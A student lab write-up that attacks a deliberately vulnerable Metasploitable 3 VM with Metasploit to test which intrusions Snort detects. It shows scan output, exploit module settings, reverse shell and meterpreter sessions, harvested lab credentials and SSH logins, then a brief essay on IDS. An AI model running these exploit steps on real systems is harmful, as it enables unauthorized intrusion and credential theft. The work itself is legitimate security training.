Within this project, we'll utilize the Metasploit Framework to execute diverse attacks on a virtual machine (VM) hosting Metasploitable 3 and running Snort. The plan involves conducting five attacks, with three of them being detectable by Snort, while the remaining two will go undetected by Snort.
First in the Metasploitable VM we will retrieve the IP and then we will initialize snort:
sudo snort -A console -u snort -g snort -c /etc/snort/snort.conf -i eth1 -k none
Now we will do a nmap scan to see the open ports:
nmap -sV
Nmap scan report for
Host is up (0.00037s latency).
Not shown: 991 filtered ports
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
631/tcp open ipp CUPS 1.7
3000/tcp closed ppp
3306/tcp open mysql MySQL (unauthorized)
8080/tcp open http Jetty 8.1.7.v20120910
8181/tcp closed intermapper
Service Info: Hosts:, METASPLOITABLE3-UB1404; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We can perform a more in depth scan with the following command:
sudo nmap -n -sS -sV -sC -p0-65535 -T4 -A -O
Starting Nmap 7.80 ( https://nmap.org ) at 2023-11-19 17:54 EET
Nmap scan report for
Host is up (0.00039s latency).
Not shown: 65525 filtered ports
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 2b:2e:1f:a4:54:26:87:76:12:26:59:58:0d:da:3b:04 (DSA)
| 2048 c9:ac:70:ef:f8:de:8b:a3:a3:44:ab:3d:32:0a:5c:6a (RSA)
| 256 c0:49:cc:18:7b:27:a4:07:0d:2a:0d:bb:42:4c:36:17 (ECDSA)
|_ 256 a0:76:f3:76:f8:f0:70:4d:09:ca:e1:10:fd:a9:cc:0a (ED25519)
80/tcp open http Apache httpd 2.4.7
| http-ls: Volume /
| - 2020-10-29 19:37 chat/
| - 2011-07-27 20:17 drupal/
| 1.7K 2020-10-29 19:37 payroll_app.php
| - 2013-04-08 12:06 phpmyadmin/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Index of /
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
631/tcp open ipp CUPS 1.7
| http-methods:
|_ Potentially risky methods: PUT
| http-robots.txt: 1 disallowed entry
|_http-server-header: CUPS/1.7 IPP/2.1
|_http-title: Home - CUPS 1.7.2
3000/tcp closed ppp
3306/tcp open mysql MySQL (unauthorized)
3500/tcp open http WEBrick httpd 1.3.1 (Ruby 2.3.8 (2018-10-18))
| http-robots.txt: 1 disallowed entry
|_http-server-header: WEBrick/1.3.1 (Ruby/2.3.8/2018-10-18)
|_http-title: Ruby on Rails: Welcome aboard
6697/tcp open irc UnrealIRCd
| irc-info:
| users: 1
| servers: 1
| lusers: 1
| lservers: 0
|_ server: irc.TestIRC.net
8080/tcp open http Jetty 8.1.7.v20120910
|_http-server-header: Jetty(8.1.7.v20120910)
|_http-title: Error 404 - Not Found
8181/tcp closed intermapper
MAC Address: 08:00:27:E0:15:6B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts:, METASPLOITABLE3-UB1404, irc.TestIRC.net; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
With this new scan we can for example see that the port 3500 and 6697 open, and we can also see different files and folders.
We can see that the port 21 is open with service ftp and version ProFTPD 1.3.5, so we perform a search on metasploit:
search proftpd
and we can see that:
Matching Modules
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow
1 exploit/linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
2 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
3 exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
4 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution
5 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution
We will use 4 since it has a excellent rank and its more recent than 5 and also matches the version of the service, we will also check the options of the exploit:
use 4
show options
And based on the output:
Module options (exploit/unix/ftp/proftpd_modcopy_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes HTTP port (TCP)
RPORT_FTP 21 yes FTP port
SITEPATH /var/www yes Absolute writable website path
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path to the website
TMPPATH /tmp yes Absolute writable path
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
set rhosts
set sitepath /var/www/html
Now we are going to try to run the exploit
[*] Started reverse TCP handler on
[*] - - Connected to FTP server
[*] - - Sending copy commands to FTP server
[*] - Executing PHP payload /x7kh3w.php
[+] - Deleted /var/www/html/x7kh3w.php
[*] Command shell session 1 opened ( -> at 2023-11-17 00:54:30 +0200
[-] - Exploit aborted due to failure: unknown: - Failure executing payload
[*] Exploit completed, but no session was created.
We can see that the exploit failed, we try to set the payload to a different one and then repeat
set payload payload/cmd/unix/reverse_perl
[*] Started reverse TCP handler on
[*] - - Connected to FTP server
[*] - - Sending copy commands to FTP server
[*] - Executing PHP payload /TWmEi.php
[+] - Deleted /var/www/html/TWmEi.php
[*] Command shell session 3 opened ( -> at 2023-11-17 01:03:35 +0200
Now we can see that the attack worked successfuly and we have a shell that we can use, from here we can see the files and folders:
If we read the file payroll_app.php
we can see that it contains some credentials:
cat payroll_app.php
$conn = new mysqli('', 'root', 'sploitme', 'payroll');
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
Then we have the following credentials which might be useful for another attack:
Also we can see that the attack was detected by snort as a priority 1 attack:
11/16-16:31:14.340657 [**] [1:1356:5] WEB-ATTACKS perl execution attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} ->
We can see that the port 631 is open with service ipp and version CUPS 1.7, so we perform a search on metasploit:
we must add vagrant to the group lpadmin to be able to use the exploit because it needs to add a printer:
sudo usermod -a -G lpadmin vagrant
We search for cups exploits:
search cups
Matching Modules
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/escalate/cups_root_file_read 2012-11-20 normal No CUPS 1.6.1 Root File Read
1 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
We decide to use 1 since it has a excellent rank and its more recent than 0, we will also check the options of the exploit:
use 1
show options
Module options (exploit/multi/http/cups_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CVE CVE-2014-6271 yes CVE to exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HttpPassword yes CUPS user password
HttpUsername root yes CUPS username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPATH /bin yes Target PATH for binaries
RPORT 631 yes The target port (TCP)
SSL true yes Use SSL
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic Targeting
set httppassword vagrant
set httpusername vagrant
Then we configure the payload:
show payloads
Compatible Payloads
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/adduser normal No Add user with useradd
1 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
2 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
3 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
4 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
5 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
And select the number 5:
set payload 5
We run the exploit
And get:
[-] Handler failed to bind to
[-] Handler failed to bind to
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (
[*] Exploit completed, but no session was created.
This is because the LHOST is not correctly set
[*] Started reverse SSL handler on
[+] Added printer successfully
[+] Deleted printer 'txAKL9H0dP' successfully
[*] Command shell session 1 opened ( -> at 2023-11-19 16:58:02 +0200
[*] - Command shell session 1 closed.
We manage to get a shell but it closes immediately, we can see that the exploit is not stable, we tried with other payloads but we get the same result.
We can also see that the attack was detected by snort as a priority 1 attack:
11/19-15:01:03.079051 [**] [1:1768:7] WEB-IIS header field buffer overflow attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} ->
In the second nmap scan, we saw in the port 80 that there was a folder called drupal
. So lets search for a exploit for drupal:
search drupal
Matching Modules
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
We choose the 2 since it has an excellent rank and SQL injection seems like a good attack to try. Then we have multiple payloads to choose, I tried with different payloads and the one that worked for me was the 18 one (php/meterpreter/reverse_tcp), then the options are usual and execute.
set TARGETURI /drupal/
After the execution we get a meterpreter session
[*] Started reverse TCP handler on
[*] Sending stage (39927 bytes) to
FATAL: terminating connection due to administrator command
[*] Meterpreter session 7 opened ( -> at 2023-11-19 23:24:17 +0200
meterpreter > getuid
Server username: www-data
snort detected the attack:
[**] [1:2012887:2] ET POLICY HTTP POST contains pass= in cleartext [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} ->
Although we have to do 3, with CUPS we could not get a stable shell, so we will try to do 4.
In the nmap we saw that the port 80 was open with service http and version Apache httpd 2.4.7, after searching for exploits we can see that there are more than 100 exploits for apache, so searching on google yields us with the exploit multi/http/apache_mod_cgi_bash_env_exec
. We perform the usual options and execute.
[*] Started reverse TCP handler on
[*] Command Stager progress - 100.00% done (1092/1092 bytes)
[*] Sending stage (1017704 bytes) to
[*] Meterpreter session 17 opened ( -> at 2023-11-20 00:04:31 +0200
meterpreter > getuid
Server username: www-data
We got access to a meterpreter, the interesting thing is that if we list the files we can see that in the directory that we are there is a file called hello_world.sh
which could be a script that is executed by some other service, so it would probably be possible to get a shell with root privileges from here.
Snort detected the attack:
11/19-22:04:30.702047 [**] [1:2022028:1] ET WEB_SERVER Possible CVE-2014-6271 Attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} ->
When we access the page
from the browser we can see that there is a phpmyadmin page, we can search for a exploit which we can use.
search phpmyadmin
Matching Modules
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/phpmyadmin_config 2009-03-24 excellent No PhpMyAdmin Config File Code Injection
1 auxiliary/scanner/http/phpmyadmin_login normal No PhpMyAdmin Login Scanner
2 post/linux/gather/phpmyadmin_credsteal normal No Phpmyadmin credentials stealer
3 auxiliary/admin/http/telpho10_credential_dump 2016-09-02 normal No Telpho10 Backup Credentials Dumper
4 exploit/multi/http/zpanel_information_disclosure_rce 2014-01-30 excellent No Zpanel Remote Unauthenticated RCE
5 exploit/multi/http/phpmyadmin_3522_backdoor 2012-09-25 normal No phpMyAdmin server_sync.php Backdoor
6 exploit/multi/http/phpmyadmin_lfi_rce 2018-06-19 good Yes phpMyAdmin Authenticated Remote Code Execution
7 exploit/multi/http/phpmyadmin_null_termination_exec 2016-06-23 excellent Yes phpMyAdmin Authenticated Remote Code Execution
8 exploit/multi/http/phpmyadmin_preg_replace 2013-04-25 excellent Yes phpMyAdmin Authenticated Remote Code Execution via preg_replace()
We choose the 8th exploit which has an excellent rank and we set its options. One of the options is the password which based on the information we gathered before is sploitme
use 8
set password sploitme
Then we run the exploit:
[*] Started reverse TCP handler on
[*] phpMyAdmin version: 3.5.8
[*] The target appears to be vulnerable.
[*] Grabbing CSRF token...
[+] Retrieved token
[*] Authenticating...
[+] Authentication successful
[*] Sending stage (39927 bytes) to
[*] Meterpreter session 5 opened ( -> at 2023-11-19 19:34:59 +0200
meterpreter >
This attack was not detected by snort.
We now have meterpreter session, although we would like to have a shell, but now that we know that the credentials root:sploitme
work, we can try them by accessing the page
from the browser, and we have payroll_app.php
in which if we try to login with the given credentials we can see that we can successfully login and see four columns but with no information.
We can also enter the folder phpmyadmin
and try to login with the same credentials and we can see that we can login successfully and looking around we see a database called drupal
and a table users
which contains the following information:
In the database mysql
, table users
Although these passwords are hashed we will keep them in case we need them later and use a tool such as john the ripper to crack them.
Lastly we will access the database payroll
and table users
which contains usernames, first names, last names, plain text passwords and salaries. We can see that if we try these users in the payroll_app.php
we can login with all of them and see the information.
We tried to login to the machine by ssh with the credentials of the table and all of them worked and we could get a shell, but Leia, Luke, and Han had sudo privileges. (han_solo:nerf_herder
, luke_skywalker:like_my_father_beforeme
, leia_organa:help_me_obiwan
Check that Leia has root
leia_organa@metasploitable3-ub1404:~$ id
uid=1111(leia_organa) gid=100(users) groups=100(users),27(sudo)
This is not detected by Snort.
In the in depth nmap we saw that the port 6697 was open with service irc and version UnrealIRCd, so we perform a search on metasploit:
search unrealircd
And there is only one exploit (unix/irc/unreal_ircd_3281_backdoor
), so we will use it.
First we look at the payloads and try different ones, I will start with the 11 (cmd/unix/reverse_ruby_ssl
) and configure its options, then we will execute the exploit.
[*] Started reverse TCP double handler on
[-] - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with ( timed out.
[*] Exploit completed, but no session was created.
This error is because the port 6667 is closed, if we look at the nmap the open port is 6697, so we will change it and try again.
set RPORT 6697
[*] Started reverse TCP double handler on
[*] - Connected to
:irc.TestIRC.net NOTICE AUTH :*** Looking up your hostname...
:irc.TestIRC.net NOTICE AUTH :*** Found your hostname (cached)
[*] - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo vzTyVdtbQstqwlSE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "vzTyVdtbQstqwlSE\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 13 opened ( -> at 2023-11-19 23:50:18 +0200
uid=1121(boba_fett) gid=100(users) groups=100(users),999(docker)
We get shell although not with root privileges, but most surprisingly snort did not detect the attack.
Intrusion Detection Systems (IDS) play a pivotal role in fortifying cybersecurity defenses, offering both benefits and shortcomings.
Their primary benefit lies in early threat detection through continuous monitoring of network traffic, offering real-time alerts for prompt responses. By detecting potential threats early, IDS can prevent unauthorized access and protect sensitive data. Furthermore, IDS can provide valuable insights into attack patterns, helping to improve future security measures.
However, IDS come with limitations. False positives and negatives can hinder their effectiveness, leading to unnecessary alerts or undetected threats. Signature-based IDS may struggle with new attacks since they a rule to be able to detect them, and resource-intensive operations can impact network performance. The rise of encrypted traffic poses a challenge, limiting the system's ability to inspect concealed threats.
In conclusion, while IDS are an essential tool in cybersecurity, their effectiveness is contingent upon proper implementation and ongoing management. Despite their shortcomings, the benefits they provide in terms of early detection and prevention of intrusions make them a worthwhile investment.